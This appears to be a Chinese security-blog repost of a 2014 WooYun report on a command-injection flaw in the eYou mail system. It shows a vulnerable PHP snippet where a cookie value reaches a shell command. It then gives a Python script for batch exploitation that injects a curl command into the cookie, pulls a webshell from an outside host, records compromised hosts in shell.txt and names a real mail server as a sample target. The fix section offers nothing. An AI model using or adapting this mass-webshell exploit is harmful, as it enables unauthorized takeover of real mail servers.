记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

亿邮邮件系统命令执行漏洞导致批量Getwebshell

2014-06-10 18:55

user/storage_fold_explore.php

<?php

/**

* 用户网络存储目录列表

*

* 该页面显示登录邮箱用户的网络存储目录列表,选择后保存邮件附件到指定的目录中。

*

* @author FengHui <fenghui@eyou.net>

* @copyright 199902008 eYou.net

* @version storage_explore.php 2008/11/12

*/

require_once('/var/eyou/apache/htdocs/config.php');

require_once(PATH.'inc/function.php');

require_once(PATH.'inc/libeyou.php');

require_once(PATH.'inc/operate.php');

require_once(PATH.'inc/user.config.php');



$skin = getCookieUserValue('SKIN');

$uid = getCookieUserValue('UID');

$domain = getCookieUserValue('DOMAIN');

$user_dir_path = getUserDirPath($uid, $domain);

$storage_index_path = $user_dir_path.'/storage/Index/';

$storage_data_path = $user_dir_path.'/storage/Data/';

$file_name = htmlspecialchars(get('file'));

$att = htmlspecialchars(get('att'));

?>



GetUser_DirPath在/inc/function.php下。

function getUserDirPath($uid, $domain) {

$cmd = "/var/eyou/sbin/hashid $uid $domain";

$path = `$cmd`;

$path = trim($path);

return $path;

}





漏洞证明:

利用代码:

__author__ = 'zengzhang'

import time,sys

import urllib,urllib2

from urlparse import urlparse



def Getwebshell(url):

url=url.strip()

header={"Cookie":"USER=UID%3d1|curl http://conqu3r.paxmac.org/test.txt>>test.php&DOMAIN%3d127.0.0.1"}

try:

request=urllib2.Request(url,None,headers=header)

rep=urllib2.urlopen(request)

except:

pass

Indentified(url)

def Readfile(filen):

fp=open(filen,'r')

for url in fp:

if url!='':

Getwebshell(url)

def Indentified(url):

url=url[:-19]

url=url+"test.php"

try:

f=urllib.urlopen(url).getcode()

if f==200:

fp=open("shell.txt","w+")

fp.write(url+"\n")

fp.close()

except:

pass

Readfile("url.txt")



url.txt内容为:http://mail.bjsasc.com/user/storage_fold_explore.php形式

EF3B5D39-11D7-4760-8E23-A0CA283D7843.png



修复方案:

你们懂的。。。


知识来源: www.wooyun.org/bugs/wooyun-2014-058531

阅读:4410254 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“亿邮邮件系统命令执行漏洞导致批量Getwebshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云